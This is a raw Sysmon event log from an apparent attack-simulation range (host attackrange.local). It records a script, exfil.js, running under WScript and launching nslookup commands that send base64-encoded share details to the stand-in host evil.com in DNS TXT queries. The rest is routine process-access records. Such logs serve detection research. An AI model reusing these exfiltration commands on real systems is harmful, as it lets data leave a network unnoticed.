14:21:53.623{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-1901-629A-A046-000000005F02}4156C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216360Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.623{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-1901-629A-A046-000000005F02}4156C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216359Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.623{2E1864BB-1901-629A-A046-000000005F02}41561960C:\Windows\system32\conhost.exe{2E1864BB-1901-629A-9F46-000000005F02}6848C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216358Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.607{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-1901-629A-A046-000000005F02}4156C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216357Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.607{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216356Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.607{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216355Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.607{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216354Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.607{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216353Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.607{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-1901-629A-9F46-000000005F02}6848C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216352Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.607{2E1864BB-18E0-629A-6742-000000005F02}39764784C:\Windows\System32\WScript.exe{2E1864BB-1901-629A-9F46-000000005F02}6848C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216351Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.613{2E1864BB-1901-629A-9F46-000000005F02}6848C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBDJA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmtd.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000216350Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.606{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlaaqn.tmpMD5=761C32825E612E802625B3B432A8B214,SHA256=93B655C823F758E66012CC507AD76996E6991D3C8795548139308F047C0D31E1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000216349Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.554{2E1864BB-1901-629A-9D46-000000005F02}77686712C:\Windows\system32\conhost.exe{2E1864BB-1901-629A-9E46-000000005F02}7316C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216348Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.554{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216347Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.554{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216346Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.554{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216345Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.554{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216344Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.554{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-1901-629A-9E46-000000005F02}7316C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216343Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.554{2E1864BB-1901-629A-9C46-000000005F02}42486216C:\Windows\system32\cmd.exe{2E1864BB-1901-629A-9E46-000000005F02}7316C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216342Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.567{2E1864BB-1901-629A-9E46-000000005F02}7316C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgQWRtaW4= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-1901-629A-9C46-000000005F02}4248C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgQWRtaW4= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlaaqn.tmp 2>&1 10341000x8000000000000000216341Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.539{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-1901-629A-9D46-000000005F02}7768C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216340Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.539{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-1901-629A-9D46-000000005F02}7768C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216339Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.539{2E1864BB-1901-629A-9D46-000000005F02}77686712C:\Windows\system32\conhost.exe{2E1864BB-1901-629A-9C46-000000005F02}4248C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216338Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.523{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-1901-629A-9D46-000000005F02}7768C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216337Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.523{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216336Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.523{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216335Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.523{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216334Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.523{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216333Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.523{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-1901-629A-9C46-000000005F02}4248C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216332Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.523{2E1864BB-18E0-629A-6742-000000005F02}39767488C:\Windows\System32\WScript.exe{2E1864BB-1901-629A-9C46-000000005F02}4248C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216331Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.526{2E1864BB-1901-629A-9C46-000000005F02}4248C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgQWRtaW4= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlaaqn.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000216330Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.523{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlwkpa.tmpMD5=1D1CCA53E4DF780302A6C1C8BFFFFD37,SHA256=3E9BA274CFCD18E7F9C724A3CED552A6AAA905F20D03820BE6FCA23A34DF3C9F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000216329Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 